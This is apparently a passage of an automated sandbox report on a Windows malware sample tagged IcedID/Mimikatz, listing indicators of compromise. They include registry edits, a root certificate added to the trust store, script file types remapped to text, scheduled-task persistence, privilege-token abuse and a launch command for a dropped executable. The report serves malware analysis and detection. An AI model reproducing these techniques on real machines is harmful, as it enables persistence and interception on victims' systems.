\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ooeaya.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eenjufmqs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nvjihepny.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1908 cmd.exe 2636 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x0008000000016d49-5.dat nsis_installer_2 behavioral1/files/0x0004000000004ed7-16.dat nsis_installer_1 behavioral1/files/0x0004000000004ed7-16.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople iugnatn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" iugnatn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tlnhsrrfm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs iugnatn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\56-9f-5d-19-e3-16 iugnatn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" tlnhsrrfm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed iugnatn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" iugnatn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tlnhsrrfm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs iugnatn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix iugnatn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections iugnatn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tlnhsrrfm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D496DE85-8C5F-4B8D-8DCB-5F9AE7EB0DC3} iugnatn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" tlnhsrrfm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings iugnatn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tlnhsrrfm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs iugnatn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 iugnatn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\56-9f-5d-19-e3-16\WpadDecisionReason = "1" iugnatn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tlnhsrrfm.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" tlnhsrrfm.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs iugnatn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D496DE85-8C5F-4B8D-8DCB-5F9AE7EB0DC3}\WpadDecisionReason = "1" iugnatn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs iugnatn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump tlnhsrrfm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs iugnatn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs iugnatn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs iugnatn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D496DE85-8C5F-4B8D-8DCB-5F9AE7EB0DC3}\WpadDecisionTime = 90ed8bbcc177db01 iugnatn.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ iugnatn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" iugnatn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" iugnatn.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 iugnatn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 iugnatn.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2636 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1216 schtasks.exe 2324 schtasks.exe 2272 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 2212 iugnatn.exe 2696 iugnatn.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1540 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1540 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2356 iugnatn.exe Token: SeDebugPrivilege 2828 iugnatn.exe Token: SeDebugPrivilege 1700 vfshost.exe Token: SeAuditPrivilege 2716 svchost.exe Token: SeDebugPrivilege 1040 tlnhsrrfm.exe Token: SeShutdownPrivilege 1040 tlnhsrrfm.exe Token: SeLockMemoryPrivilege 2148 reirjf.exe Token: SeLockMemoryPrivilege 2148 reirjf.exe Token: SeDebugPrivilege 1780 tlnhsrrfm.exe Token: SeShutdownPrivilege 1780 tlnhsrrfm.exe Token: SeDebugPrivilege 1272 tlnhsrrfm.exe Token: SeShutdownPrivilege 1272 tlnhsrrfm.exe Token: SeDebugPrivilege 2676 tlnhsrrfm.exe Token: SeShutdownPrivilege 2676 tlnhsrrfm.exe Token: SeDebugPrivilege 2572 tlnhsrrfm.exe Token: SeShutdownPrivilege 2572 tlnhsrrfm.exe Token: SeDebugPrivilege 2744 tlnhsrrfm.exe Token: SeShutdownPrivilege 2744 tlnhsrrfm.exe Token: SeDebugPrivilege 1288 tlnhsrrfm.exe Token: SeShutdownPrivilege 1288 tlnhsrrfm.exe Token: SeDebugPrivilege 544 tlnhsrrfm.exe Token: SeShutdownPrivilege 544 tlnhsrrfm.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1540 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe 1540 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe 2356 iugnatn.exe 2356 iugnatn.exe 2828 iugnatn.exe 2828 iugnatn.exe 1844 xohudmc.exe 2180 ooeaya.exe 2212 iugnatn.exe 2212 iugnatn.exe 2696 iugnatn.exe 2696 iugnatn.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1540 wrote to memory of 1908 1540 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe 30 PID 1540 wrote to memory of 1908 1540 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe 30 PID 1540 wrote to memory of 1908 1540 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe 30 PID 1540 wrote to memory of 1908 1540 2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe 30 PID 1908 wrote to memory of 2636 1908 cmd.exe 32 PID 1908 wrote to memory of 2636 1908 cmd.exe 32 PID 1908 wrote to memory of 2636 1908 cmd.exe 32 PID 1908 wrote to memory of 2636 1908 cmd.exe 32 PID 1908 wrote to memory of 2356 1908 cmd.exe 33 PID 1908 wrote to memory of 2356 1908 cmd.exe 33 PID 1908 wrote to memory of 2356 1908 cmd.exe 33 PID 1908 wrote to memory of 2356 1908 cmd.exe 33 PID 2828 wrote to memory of 1628 2828 iugnatn.exe 35 PID 2828 wrote to memory of 1628 2828 iugnatn.exe 35 PID 2828 wrote to memory of 1628 2828 iugnatn.exe 35 PID 2828 wrote to memory of 1628 2828 iugnatn.exe 35 PID 1628 wrote to memory of 2100 1628 cmd.exe 37 PID 1628 wrote to memory of 2100 1628 cmd.exe 37 PID 1628 wrote to memory of 2100 1628 cmd.exe 37 PID 1628 wrote to memory of 2100 1628 cmd.exe 37 PID 1628 wrote to memory of 2700 1628 cmd.exe 38 PID 1628 wrote to memory of 2700 1628 cmd.exe 38 PID 1628 wrote to memory of 2700 1628 cmd.exe 38 PID 1628 wrote to memory of 2700 1628 cmd.exe 38 PID 1628 wrote to memory of 2816 1628 cmd.exe 39 PID 1628 wrote to memory of 2816 1628 cmd.exe 39 PID 1628 wrote to memory of 2816 1628 cmd.exe 39 PID 1628 wrote to memory of 2816 1628 cmd.exe 39 PID 1628 wrote to memory of 2736 1628 cmd.exe 40 PID 1628 wrote to memory of 2736 1628 cmd.exe 40 PID 1628 wrote to memory of 2736 1628 cmd.exe 40 PID 1628 wrote to memory of 2736 1628 cmd.exe 40 PID 1628 wrote to memory of 2656 1628 cmd.exe 41 PID 1628 wrote to memory of 2656 1628 cmd.exe 41 PID 1628 wrote to memory of 2656 1628 cmd.exe 41 PID 1628 wrote to memory of 2656 1628 cmd.exe 41 PID 1628 wrote to memory of 2900 1628 cmd.exe 42 PID 1628 wrote to memory of 2900 1628 cmd.exe 42 PID 1628 wrote to memory of 2900 1628 cmd.exe 42 PID 1628 wrote to memory of 2900 1628 cmd.exe 42 PID 2828 wrote to memory of 2288 2828 iugnatn.exe 43 PID 2828 wrote to memory of 2288 2828 iugnatn.exe 43 PID 2828 wrote to memory of 2288 2828 iugnatn.exe 43 PID 2828 wrote to memory of 2288 2828 iugnatn.exe 43 PID 2828 wrote to memory of 2664 2828 iugnatn.exe 46 PID 2828 wrote to memory of 2664 2828 iugnatn.exe 46 PID 2828 wrote to memory of 2664 2828 iugnatn.exe 46 PID 2828 wrote to memory of 2664 2828 iugnatn.exe 46 PID 2828 wrote to memory of 2616 2828 iugnatn.exe 48 PID 2828 wrote to memory of 2616 2828 iugnatn.exe 48 PID 2828 wrote to memory of 2616 2828 iugnatn.exe 48 PID 2828 wrote to memory of 2616 2828 iugnatn.exe 48 PID 2828 wrote to memory of 972 2828 iugnatn.exe 50 PID 2828 wrote to memory of 972 2828 iugnatn.exe 50 PID 2828 wrote to memory of 972 2828 iugnatn.exe 50 PID 2828 wrote to memory of 972 2828 iugnatn.exe 50 PID 972 wrote to memory of 2820 972 cmd.exe 52 PID 972 wrote to memory of 2820 972 cmd.exe 52 PID 972 wrote to memory of 2820 972 cmd.exe 52 PID 972 wrote to memory of 2820 972 cmd.exe 52 PID 972 wrote to memory of 2820 972 cmd.exe 52 PID 972 wrote to memory of 2820 972 cmd.exe 52 PID 972 wrote to memory of 2820 972 cmd.exe 52 PID 2820 wrote to memory of 980 2820 wpcap.exe 53
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1016
-
C:\Windows\TEMP\salleihmy\reirjf.exe"C:\Windows\TEMP\salleihmy\reirjf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
C:\Users\Admin\AppData\Local\Temp\2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-02-05_987f2523a6d3545a624d88e62406b355_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\clyfknye\iugnatn.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2636
-
-
C:\Windows\clyfknye\iugnatn.exeC:\Windows\clyfknye\iugnatn.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2356
-
-
-
